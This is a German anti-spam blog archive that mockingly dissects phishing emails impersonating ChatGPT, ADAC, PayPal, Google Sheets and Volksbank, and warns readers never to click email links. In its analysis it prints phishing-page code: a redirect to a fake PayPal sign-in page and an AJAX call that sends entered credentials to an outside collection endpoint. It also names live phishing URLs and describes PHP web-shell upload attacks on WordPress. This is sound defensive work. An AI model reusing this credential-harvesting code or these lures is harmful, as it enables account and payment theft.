Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Kategoriearchiv „Phishing“

Ζаhⅼսոցѕрrоbⅼеⅿ: Αktսаⅼіѕіеrսոց еrfοrⅾеrⅼісh, սⅿ Ӏhr Αbоոոеⅿеոt fоrtzսѕеtzеո

Donnerstag, 30. Oktober 2025

Oh, schön, mit lustigen, aber auch etwas versteckten Unicodezeichen im Betreff, damit der Müll durch die Spamfilter kommt. Hat natürlich nicht geklappt, sondern gleich noch mal ein paar Zusatzpünktchen gegeben. 🤭️

Wer schreibt mir denn heute?

Von: СhаtᏀΡТ-Ζаhⅼսոցеո <no-reply@chatgpt.de>

Bis eben wusste ich nicht einmal, dass man bei ChatGPT auch etwas abonnieren kann. Ich nutze ja keine angelernten neuronalen Netzwerke, außer vielleicht, um ein paar Quatschbilder zu machen (das hat längst keinen Sinn mehr, die Bilder sind tendenziell kitschig und unbrauchbar geworden, das dekorative Roboter-Bild an der Seite ist schon anderthalb Jahre alt und stammt aus einer Übergangszeit, in der die Verkitschung noch erträglich und wenigstens einige Bilder noch benutzbar waren) oder um mal zu schauen, ob sich da inzwischen wirklich Spuren von „Intelligenz“ zeigen, die nicht einfach nur aufwändig gekünstelt sind. Aber es gibt immer noch nur den Gnobbelmatsch des künstlichen Dunning-Kruger-Effektes. Unfassbar, dass Menschen mit so einem unbrauchbaren und dummen Schrott ernsthaft etwas anfangen wollen. Unfassbar, dass Journalisten sich auf so einen Schrott verlassen. Oder, dass so genannte „Entscheidungsträger“ – das ist ein modernes deutsches Wort für technisch inkompetente Geldverbrenner – damit die Produktivität steigern wollen. Und jetzt kriege ich angeblich schon Zahlungsprobleme. Mit lustigen Unicode-Zeichen.

Die Spam entspricht vollständig dem normalen Phishing-Schema:

ChatGPT Logo

ChatGPT-Abonnement

Abonnement-Aktualisierung erforderlich | 2025

Sehr geehrte Kundin, sehr geehrter Kunde,

Wir haben festgestellt, dass Ihr ChatGPT-Abonnement aktualisiert werden muss, um Unterbrechungen Ihres Dienstes zu vermeiden.

Wichtig: Wenn Ihr Abonnement nicht innerhalb von 48 Stunden aktualisiert wird, kann der Zugriff auf Premium-Funktionen eingeschränkt oder ausgesetzt werden.

Um einen unterbrechungsfreien Zugriff sicherzustellen, aktualisieren Sie bitte Ihre Abonnementdaten über den folgenden Button:

Abonnement aktualisieren

Wenn Sie Fragen haben oder Hilfe benötigen, steht Ihnen unser Support-Team gerne zur Verfügung.

Vielen Dank, dass Sie ChatGPT nutzen.

Mit freundlichen Grüßen,

ChatGPT Support-Team

OpenAI Services

123 Innovation Way, Virtual City

Tel: +1 (800) 123-4567

© 2025 ChatGPT. Alle Rechte vorbehalten.
Bitte überprüfen Sie offizielle Links und geben Sie Ihre Daten nicht auf verdächtigen Webseiten ein.

Nein, die Telefonnummer ist nicht von mir so hingeschrieben, die steht da wirklich so. Die ist ja einprägsam wie mein Passwort! 🤭️

Aber da steht ja auch, dass ich ChatGPT nutze und sogar dafür bezahle. Das stimmt nicht. Die bedanken sich sogar pseudohöflich dafür. Obwohl es gar nicht stimmt.

Der Link führt in eine Website bei einem kommerziellen Anbieter, bei dem man auf WordPress basierende Websites hosten, einrichten und pflegen kann – und die Phishing-Website dort ist schon weg, weil die meisten anderen Unternehmen als Google eben keine Lust haben, zum besten Freund des Spammers und Betrügers zu werden. Aber wir wissen ja alle, was es dort gegeben hätte: Man konnte sich dort auf einer „liebevoll“ nachgemachten Website „anmelden“, und danach gehört das Konto einem betrügerischen Spammer. Der kann dann zum Beispiel die teuren Premiumzugänge anderer Leute (zurzeit immerhin 276 € pro Jahr¹ für die einfachste Stufe, den billigen Plus-Account) kostenlos einsammeln und irgendwo billiger weiterverkaufen. Vielleicht sogar mehrfach. Und weil es ja angeblich ein „Zahlungsproblem“ gibt, wird vielleicht auch gleich die Kreditkarte übernommen. Er ist ja ein Betrüger, wie man schon an dieser Spam mit dem versuchten Trickbetrug sieht.

Ich bin mal gespannt, ob ich in Zukunft noch häufiger ein Phishing auf Benutzerkonten bei Anbietern angelernter neuronaler Netzwerke sehen werde. Wie viele Leute dafür inzwischen – nach jahrelanger Reklame im contentindustriellen Journalismus unter ständiger Benutzung des Reklamewortes „Künstliche Intelligenz“ – Geld auszugeben bereit sind.

Zum Glück für uns alle gibt es einen sehr einfachen, kostenlosen und fehlerfrei wirksamen Schutz gegen Phishing: Niemals in eine E-Mail klicken! Stattdessen für häufig besuchte Websites, bei denen man ein Nutzerkonto hat, immer ein Lesezeichen im Webbrowser anlegen und diese Websites nur noch über das Lesezeichen aufrufen. Wenn man nicht in eine E-Mail klickt, kann einem kein Trickbetrüger so einfach einen giftigen Link unterschieben. Sollte einmal eine „komische Mail“ ankommen, bei der man nicht sofort weiß, dass es eine Spam ist, nicht in diese Mail klicken, sondern einfach die Website über das Lesezeichen im Browser aufrufen und sich dort wie gewohnt anmelden. Wenn man danach keinen Hinweis auf das angebliche Problem sieht, hat man eine dieser gefürchteten „Cyberattacken“ abgewehrt. So einfach geht das. Macht das! 🛡️

¹Ich hätte das gern verlinkt, aber Open AI hält es für eine gute Idee, seine Preisliste mit vorsätzlicher Technikverhinderung nicht archivierbar zu machen, so dass ich meinen Preis nicht belege. Es ist schon sehr seltsam, dass nur die Preise, also das Wesentliche, in der Preisliste fehlen. Ich habe diese ganzen Klitschen noch nie für besonders vertrauenswürdig gehalten, aber jetzt bin ich mir völlig sicher, dass die kein seriöses Geschäftsmodell haben und klar vorsätzlich am Rande grenzbetrügerischer Machenschaften arbeiten. Warum sonst sollte man die Archivierung einer Preistabelle vorsätzlich sabotieren, wenn man nichts Übles beabsichtigt?

Aktualisiere deine persönlichen Daten für mehr Sicherheit.

Montag, 27. Oktober 2025

⚠️ Phishing-Alarm! ⚠️

Von: ADAC <datenschutz@adac.de>
An: ADAC | Online <datenschutz@adac.de>

Da stehe ich ja gar nicht als Empfänger drin. Die schreiben einfach an sich selbst. 🤭️

Die Mail wurde übrigens über eine IP-Adresse aus Island versendet. Sie kommt nicht vom ADAC. Deshalb kommt sie auch bei Menschen wie mir an, die kein Mitglied des ADAC sind, nicht autofahren und noch nicht einmal einen Führerschein haben. Dieser Müll geht an alle möglichen Mailadressen:

ADAC – Kundendienst

🔔 Dringende Sicherheitsüberprüfung – Bitte reagieren Sie umgehend!

Sehr geehrte Damen und Herren,

bei einer routinemäßigen Überprüfung Ihrer Kontoinformationen wurden Unregelmäßigkeiten festgestellt. Um Ihr Benutzerkonto vor möglichen Risiken zu schützen und dessen volle Funktionalität zu gewährleisten, bitten wir Sie, Ihre Angaben zu überprüfen und bei Bedarf zu aktualisieren.

Zur schnellen Bestätigung Ihrer Daten klicken Sie bitte auf den nachstehenden Link und folgen Sie den angezeigten Schritten:

Daten jetzt überprüfen

Der Link geht natürlich auch nicht zum ADAC. Wer da klickt, besucht die Website von kriminellen Spammern.

Wir danken Ihnen für Ihre Aufmerksamkeit und Ihr entgegengebrachtes Vertrauen.

Vielen Dank für den pseudohöflichen Dank für nichts an die sehr geehrten Damen und Herren.

Batteriegesetz Widerrufsbelehrung Datenschutz AGB Impressum

Auf ein im deutschen Rechtsraum für gewerbliche E-Mail obligatorisches E-Mail-Impressum wurde hingegen verzichtet. Ein kaputter Link – alle fünf Links führen nicht ins Web – ist kein Ersatz für die erforderlichen Angaben. Es wäre nicht einmal ein Ersatz, wenn der Link auf ein Impressum in einer Website führte. Der ADAC würde sicherlich die Gesetze der BRD einhalten.

Bitte nicht darauf reinfallen und einfach löschen!

Erinnerung: Identitätsnachweis für Ihr Online-Banking erforderlich

Donnerstag, 23. Oktober 2025

Phishingalarm! 🎣️

Von: Ꮲaypal <postmaster@02b32ad9e2.nxcli.io>

Das ist nicht PayPal.

Paypal, Paypal Icon, Paypal Logo …

Da hilft auch alle eingebettete Grafik nicht, deren Alternativtexte ich sehe, der Absender dieser Spam ist nicht Paypal, und um das zu sehen, muss man nur auf die Absenderadresse schauen. Die Mailadresse des Absenders liegt nicht in der Domain von Paypal. (Das ist übrigens kein sicheres Erkennungszeichen. Aber hier hätte es gereicht.)

sehr geehrter Kunde,

Das ist nicht mein Name.

Wir haben Sie kürzlich gebeten, Ihre Identität online zu verifizieren, haben Ihr Dokument jedoch leider noch nicht erhalten.

Was für ein Dokument wollt ihr denn „online“ von mir? Reicht ein Foto vom Yps-Ausweis? Oder muss ich mühsam eines der vielen Fotos eines Personalausweises oder Reisepasses irgendwo runterladen, das in den letzten Datenschleudereien von irgendwelchen Unternehmen veröffentlicht wurde? 🤭️

Ohne Verifizierung können Sie ab dem 24. Oktober keine Online-Banking-Dienste mehr nutzen. Zur Verifizierung benötigen Sie die Referenznummer in dieser E-Mail.

Die Gärung Nummer lautet: 501541.

Die was für eine Nummer bitte? 🤣️

Das ist, abgesehen von Deppen Leer Zeichen und Dada-Übelsetzung, mal wieder so ein richtig hochsicheres Sicherheitsverfahren! Der ganz geheime Geheimcode wird in einer E-Mail mitgeteilt, die – wegen des Verzichts auf digitale Signatur und Verschlüsselung – offen wie eine Postkarte durch das Internet befördert wird und auf dem gesamten Weg beliebig lesbar und manipulierbar ist. Eventuelle Manipulationen könnte der Empfänger nicht erkennen.

Dieser Code ist 24 Stunden gültig und wurde von den Notaren eingegeben.

Davon wird das bescheuerte Verfahren aus der blühenden Phantasie eines informationstechnischen Analphabeten auch nur teurer, aber kein bisschen sicherer. Diese Notare haben immer sehr teure Stempel. 🤣️

Melden Sie sich in Ihrem Online-Konto an unter: https://www.paypal.com/id=8356674611

Das ist kein Link auf PayPal. Der Linktext sieht zwar so aus, aber die Linkadresse führt woanders hin. Wer eine gute Mailsoftware benutzt, wird deutlich vor diesem Standardmuster aus betrügerischen Spams gewarnt. Eine solche Warnung sieht so aus:

Screenshot des Hinweises aus dem Thunderbird: Der aufgerufene Link scheint zu einer anderen Website zu führen, als im Linktext angegeben. Dies wird manchmal verwendet, um nachzuverfolgen, ob Sie den Link angeklickt haben; es könnte jedoch auch ein Betrug sein. -- Der Linktext gab an, dass der Link zu delivery.fedex.com führen würde, er führt aber zu noubau.es. -- [noubau.es trotzdem aufrufen] -- [Abbrechen] -- [delivery.fedex.com aufrufen]

Die Nutzer von irgendwelchen Webmailern haben dieses zusätzliche Sicherheitsnetz nicht.

Der Link führt indirekt…

$ lynx -source http://jrgtransport.pe/nak.php; echo
  </head>

  <body class="gradient gift-card">
   
    <div hidden>
      <span id="a11y-new-window-message">{{ 'accessibility.link_messages.new_window' | t }}</span>
    </div>
  </body>
</html>
<script> window.location.href = "https://manoloh.dream.press/wp-admin/janika/falo/signin.php";</script>
$ surbl manoloh.dream.press
manoloh.dream.press	okay
$ _

…in ein gecracktes WordPress-Blog. Dieses steht zurzeit noch nicht auf den Blacklists, deshalb warnt der Webbrowser auch nicht vor dem Betrugsversuch, wenn diese Website aufgerufen wird. Wer sich auf Schlangenöl im Webbrowser verlässt, ist verlassen. Der Mitmensch, dessen WordPress-Blog von Kriminellen gecrackt wurde, tut mir leid. Nicht nur, dass die Reputation seiner Website nachhaltig im Eimer ist, er wird auch demnächst die Kriminalpolizei kennenlernen und in den kommenden Monaten immer wieder seine Geschichte erzählen „dürfen“. Jeder weiß etwas besseres mit seiner Lebenszeit anzufangen.

Wer eine Website mit WordPress betreibt, so, wie ich es auch mit Unser täglich Spam mache, lebt damit, ein verbreitetes „Standardsystem“ zu benutzen, das immer wieder von solchen Crackern attackiert wird. Ich möchte hier keine verbindlichen Hinweise zum Schutz vor solchen Machenschaften geben, weil solche Cracker ein gewisses Maß an „Kreativität“ entfalten können. Aber diese grundlegenden Tipps sollten immer beherzigt werden:

  1. WordPress und alle verwendeten Plugins immer auf aktuellem Stand halten! Fehler, die beseitigt wurden, können nicht mehr ausgenutzt werden.
  2. Zugriffsrechte im Dateisystem des Servers so restriktiv vergeben, wie es gerade noch möglich ist, um WordPress betreiben zu können. Ja, innerhalb wp-content muss WordPress mit den Rechten des Webservers schreiben können, das ist unvermeidbar, weil hochgeladene Dateien ja irgendwo abgelegt werden müssen. In anderen Verzeichnissen reichen Lesezugriffe, insbesondere in wp-admin!
  3. Häufig ist für Angreifer ein Upload möglich, ohne die Rechte dazu zu haben, weil es Fehler im WordPress-Kern oder in einem benutzten Plugin gibt. Ein gängiger Angriff besteht dann darin, eine in PHP geschriebene Shell hochzuladen, um damit beliebige Kommandos mit den Rechten des Webservers ausführen zu können. Auf diese Weise kann man – natürlich automatisiert, denn Cracker sind genau so faul wie Spammer, wenn sie skriptgesteuert nach Opferrechnern suchen¹ – nach weiteren Schwachstellen und unsicheren Konfigurationen Ausschau halten, um eventuell seine Rechte auszuweiten. Auch ist der Zugriff auf die Datenbank mit den Rechten der WordPress-Installation möglich, deren Anmeldedaten leicht ausgelesen werden können. Diesen sehr häufigen Angriff kann man unterbinden, indem man im Verzeichnis wp-content/uploads eine Datei namens .htaccess ablegt, die jegliche Ausführung von PHP-Skripten durch den Webserver in diesem Verzeichnis unterbindet. Diese Datei kann zum Beispiel für den Webserver Apache so aussehen:
    php_flag engine off
    AddType text/plain .html .htm .shtml .php .php3 .phtml .phtm .pl .py .cgi
    

    Natürlich ist dieser Hinweis ohne Gewähr für Vollständigkeit oder Korrektheit. Verklagen sie nicht mich, wenn es nicht klappen sollte, verklagen sie die kriminellen Cracker! Und vor allem: Informieren sie sich selbst ein bisschen. So ein kompliziertes Monster ist ein Webserver auch wieder nicht, nicht einmal der aufgedunsene, aber auch gut dokumentierte Apache. Es ist ganz gut, wenn man die Software, die man benutzt, auch ein bisschen versteht. Vor allem in diesem Internet mit seinen speziellen Kriminalitätsformen.

Diese drei Punkte sind natürlich nur sehr grundlegende Vorkehrungen gegen häufige Angriffe.

Der Spammer und Phisher hat auch drei tolle Punkte:

1. Geben Sie die erforderlichen Informationen ein.
2. Schließen Sie die SMS-Verifizierung ab.
3. Identifizierung abgeschlossen.

Wenn man auf den Link geklickt hat, sieht man eine „liebevoll“ nachgemachte Anmeldeseite von PayPal. Dort „darf“ man die Mailadresse und das Passwort eingeben. Danach wird das PayPal-Konto von Kriminellen übernommen, und man hat den Schaden.

Phishing ist immer noch eine der häufigsten Formen des Trickbetrugs im heutigen Internet. Zum Glück gibt es ein sehr wirksames und völlig kostenloses Mittel dagegen: Niemals in eine E-Mail klicken! Stattdessen für Websites wie die von PayPal Lesezeichen im Webbrowser anlegen und diese Websites nur über diese Lesezeichen aufrufen. Dann kann einem kein Verbrecher so einfach einen giftigen Link unterschieben. Wenn man nach dem Empfang einer solchen Mail einmal unsicher sein sollte, einfach PayPal über das Lesezeichen aufrufen und sich dort wie gewohnt anmelden. Wenn man dann keinen Hinweis auf das Problem sieht, von dem in der Spam gefaselt wird, hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt und viel Geld gespart. So einfach geht das. Machen sie das! 🛡️

Sollen die Phisher doch verhungern!

Beste grüße,

© Copyright 2025

Mit den besten Grüßen des Jahres vom Copyright.

Entf! 🗑️

¹Ich habe auf Unser täglich Spam recht regelmäßig derartige Versuche von Kriminellen und kann in den Logdateien sehen, was sie alles ausprobieren.

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

  1. Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
  2. Die Domain tamagothi.de wird nicht von Google verwaltet.
  3. Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrauchte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

Information zu Ihrer Online-Rückerstattung

Dienstag, 30. September 2025

Was ist denn eine Online-Rückerstattung. Kriege ich da mein „Online“ zurück? 😁️

Von: Paуpal <postmaster@647fdc28cd.nxcli.io>

Das ist ganz sicher nicht PayPal. 🎣️

Paypal PNG Images | Vecteurs Et …

Das ist ganz sicher nicht PayPal. 🎣️🤥️

Rückerstattungsanforderung erfolgreich akzeptiert

„Erfolgreich akzeptiert“ ist ein tolles Wort. Klingt wie das genaue Gegenteil von „erfolglos abgewiesen“. 😅️

Guten Morgen,

Genau mein Name!

Wir möchten Sie darüber informieren, […]

Dann tut es doch!

[…] dass Ihre Online-Rückerstattung zur Bearbeitung bereitsteht. Bitte führen Sie die erforderlichen Schritte aus, um sie zu erhalten.

Um Ihre Rückerstattung zu erhalten, verwenden Sie bitte den folgenden Link:

Online-Rückerstattung

Der Link führt natürlich nicht zu PayPal. 🎣️

$ location-cascade "https://chscompaines.10web.cloud/bobo.php"
     1	https://updt-post-inder.codeanyapp.com/plp/sd/id/
     2	signin.php?enc=62dcf9606e572bbd1d6612ee4fc17cde&p=0&dispatch=91e819e167f8d558d2dee110764d8ceb25967e42
$ _

Dort darf man dann Verbrechern den Vollzugriff auf sein PayPal-Konto gewähren, denn die Anmeldedaten, die man dort in einem „liebevoll“ nachgemachten PayPal-Login angibt, gehen direkt an Trickbetrüger:

Screenshot der Phishing-Seite: Nachgemachtes PayPal-Login

Wenn man in die Adressleiste seines Browsers schaut, sieht man, dass man sich gar nicht auf der Website von PayPal befindet. Dafür haben Webbrowser übrigens diese Adressleiste: Dass man auch weiß, wo man gerade ist. Dafür muss man nur hingucken. Es ist beinahe immer gut, zu wissen, wo man ist.

Zum Glück für uns alle gibt es einen ganz einfachen und sehr zuverlässigen Schutz gegen Phishing, einer der häufigsten Trickbetrugsformen im gegenwärtigen Internet: Niemals in eine E-Mail klicken! Wenn man sich für Websites wie PayPal Lesezeichen im Webbrowser anlegt und diese Websites nur noch über diese Lesezeichen aufruft, dann kann einem kein Betrüger so leicht einen irreführenden Link in einer E-Mail unterschieben. Wenn man eine solche Mail empfangen hat und sich unsicher ist, ob sie nicht vielleicht doch echt sein könnte: Einfach die Website von PayPal über das Lesezeichen im Webbrowser aufrufen und sich dort wie gewohnt anmelden! Wenn man dort keine entsprechende Benachrichtigung sieht, hat man einen dieser gefürchteten Cyberangriffe abgewehrt (und sich viel Ärger erspart). So einfach geht das. Macht das! 🛡️

Wenn Sie dem Link nicht innerhalb von 48 Stunden folgen, erfolgt keine Rückerstattung. So reichen Sie eine weitere Rückerstattungsanfrage ein.

Nicht nachdenken, klicken! Sonst kriegt das Geld Flügel! 💸️

Fristsetzungen von zwei Tagen sind übrigens sittenwidrig.

Für weitere Informationen kontaktieren Sie uns bitte unter support@paуpal.de

Bitte nicht an die Absenderadresse antworten!

Bedankt voor uw vertrouwen.

Ich vermute mal, für den Spammer, der weder das eine noch das andere wirklich kennt, sieht Niederländisch im Schriftbild genau so unverständlich wie Deutsch aus. Het is jammer als je helemaal geen hersenen hebt. 😄️

© Copyright 2025 by PayPal

Keine dumme Spam ist vollständig ohne das proklamierte „geistige Eigentum“ auf einen Stummeltext, der nicht einmal in die Nähe der dafür erforderlichen Schöpfungshöhe kommt. Das liegt daran, dass echte Unternehmen genau die gleiche dumme, intelligenzverachtende, hilflos jurafuchtelnde und einschüchternsollende und juristisch völlig wirkungslose Angewohnheit haben.

Verklag mich für mein Vollzitat, Spammer! 😂️

Entf! 🗑️

Handlungsbedarf: Die ausstehende SEPA-Überweisung umgehend stornieren

Sonntag, 21. September 2025

Nein, das ist keine Mail…

Von: Volksbank <noreply@volksbanking.de>

…der Volksbank. Das ist Phishing. Der Link führt nicht auf die Website der Volksbank. Derartige Spams sind im Moment sehr häufig, und vermutlich nicht nur bei mir.

Logo

Hallo Kunde,

Aua, diese Lachschmerzen! Das ist ja mal wieder ganz genau mein Name. Und vor allem ist es…

Wir haben eine ungewöhnliche Abbuchung von Ihrem Bankkonto festgestellt.

…ganz genau meine Kontonummer. Denn natürlich würde eine echte Bank angeben, welches Konto gemeint ist. Es haben ja doch eine Menge Menschen mehrere Bankkonten, etwa um Einkünfte aus selbstständiger Tätigkeit sauber von ihren privaten Umsätzen zu trennen.

Diese Abbuchung scheint nicht mit Ihren üblichen Transaktionen übereinzustimmen.
Wir empfehlen Ihnen, zu überprüfen, ob sie Ihnen bekannt ist.
▶️ Wenn diese Abbuchung unbekannt ist, stornieren Sie sie bitte über Ihren Kundenbereich im Web.

Zugang zu meinem Kundenbereich

Der Link geht natürlich nicht zur Volksbank, sondern zur Website in einer Domain…

$ surbl emvrback.tftpd.net
emvrback.tftpd.net	LISTED: PH
$ _

…die bereits wegen Trickbetrugs (Phishing) auf allen Blacklists dieser Welt steht. Zum Glück für uns alle gibt es einen ganzen einfachen Trick, wie man niemals mehr auf eine der häufigsten Formen des Trickbetrugs im gegenwärtigen Internet hereinfallen kann: Niemals in eine E-Mail klicken! Stattdessen für die Website der Bank (und für Betrüger vergleichbar interessante Websites wie etwa eBay, Amazon) ein Lesezeichen im Browser anlegen und diese Websites nur noch über das dafür angelegte Lesezeichen aufrufen. Dann kann einem kein Betrüger mehr so einfach einen giftigen Link unterschieben.

Wenn man nach Empfang dieser Spam die Website der Bank über das Lesezeichen im Browser aufruft, sich dort wie gewohnt anmeldet und sieht, dass das in der Spam behauptete Problem gar nicht existiert, dann hat man einen dieser gefürchteten Cyberangriffe abgewehrt, eine Menge Geld gespart und verhindert, dass einem viel beschränkte Lebenszeit durch kriminelle Machenschaften versalzen wird. So einfach geht das. Macht das! 🛡️

(Und nein, das mit den Cyberangriffen war kein Witz. Die meisten Taten, die von digital analphabetischen Journalisten und P‘litikern mit dem offendümmlichen Cyberwort bezeichnet werden, obwohl sie nichts mit Kybernetik zu tun haben, werden über irreführende E-Mail begangen und würden nicht funktionieren, wenn Menschen nicht mehr in E-Mails klickten – oder wenn in Unternehmen und Verwaltungen eine Kultur des digitalen Signierens herrschte, die den Absender einer Mail jenseits vernünftiger Zweifel sicherstellt, denn dann könnte man wieder klicken.)

Wenn wir nicht in kürzester Zeit eine Antwort erhalten, können wir für keine Aktion, die mit Ihrem Konto verbunden ist, verantwortlich gemacht werden.

Solche Aufforderungen, gar nicht erst nachzudenken und ganz schnell zu klicken, weil sonst das Geld futschikato weg ist, sind typisch für Phishing. Gern auch mit absurd kurzen Fristsetzungen. Denn jemand, der auch nur einen kurzen Moment nachdenkt, bemerkt meistens das Folgende:

  1. Ich weiß von dem Problem nur wegen einer Mail.
  2. Diese Mail hat einen „komischen“ Absender.
  3. Ich werde in dieser Mail nicht persönlich angesprochen.
  4. Die Kontonummer des Kontos, um das es geht, wird nicht genannt.
  5. So eine Mail habe ich noch nie von der Bank gekriegt.
  6. Woher hat die Bank eigentlich meine Mailadresse?
  7. Wenn ich mit dem Mauszeiger über dem Link stehe und in die Statuszeile gucke, sehe ich, dass es gar nicht zur Website der Bank geht.

Deshalb wird von den Betrügern immer Druck gemacht. Die leben ja davon, dass Leute auf so einen Trickbetrug reinfallen.

Mit freundlichen Grüßen,
Sicherheitsdienst der Volksbank

Ob der Sicherheitsdienst wohl Schlagstöcke hat? 😁️

SSB Automatic Invoice

Samstag, 20. September 2025

Ja, ich merke es schon: Das ist eine sehr „automatische“ Rechnung. Sie kommt auch völlig grundlos bei mir an.

Logo

Ich habe auch ein Logo.

Dear nachtwaechter,

Immerhin besser als „Guten Tag“, aber trotzdem nicht der richtige Name. Gar nicht auszudenken, wie das klingt, wenn jemand „schnupsimaus69 at irgendwas“ heißt. 😁️

This is a billing notice that your invoice INV–2147483648 generated on nachtwaechter is now overdue.

Oh, toll: Mit Nummer. Muss wichtig sein, sonst hätte es ja keine Nummer. Hier, Spammer, wenn euch die Nummern mal ausgehen sollten, ich habe noch ein paar für euch:

$ dd if=/dev/urandom bs=64 count=1 | od -l | sed 's/^[0-9]*[ -]*//' | tr – ' '
1+0 Datensätze ein
1+0 Datensätze aus
64 Bytes kopiert, 2,8494e-05 s, 2,2 MB/s
9104019511127040432  3556446584735863681
6517096418393505982  8953164502467161676
3433427370092636688  7981156417554269279
8046936970601088068  8050893807030589722
$ _

So können eure Spams immer so richtig irre wichtig aussehen. Da vergisst man sogar die mögliche Anrede als Schnupsimaus 69, wenn man so wichtige Nummern sieht. 😁️

Pay now to avoid service cancellation.

Invoice: INV–2147483648

Due Date: 9/19/2025 6:28:32 AM

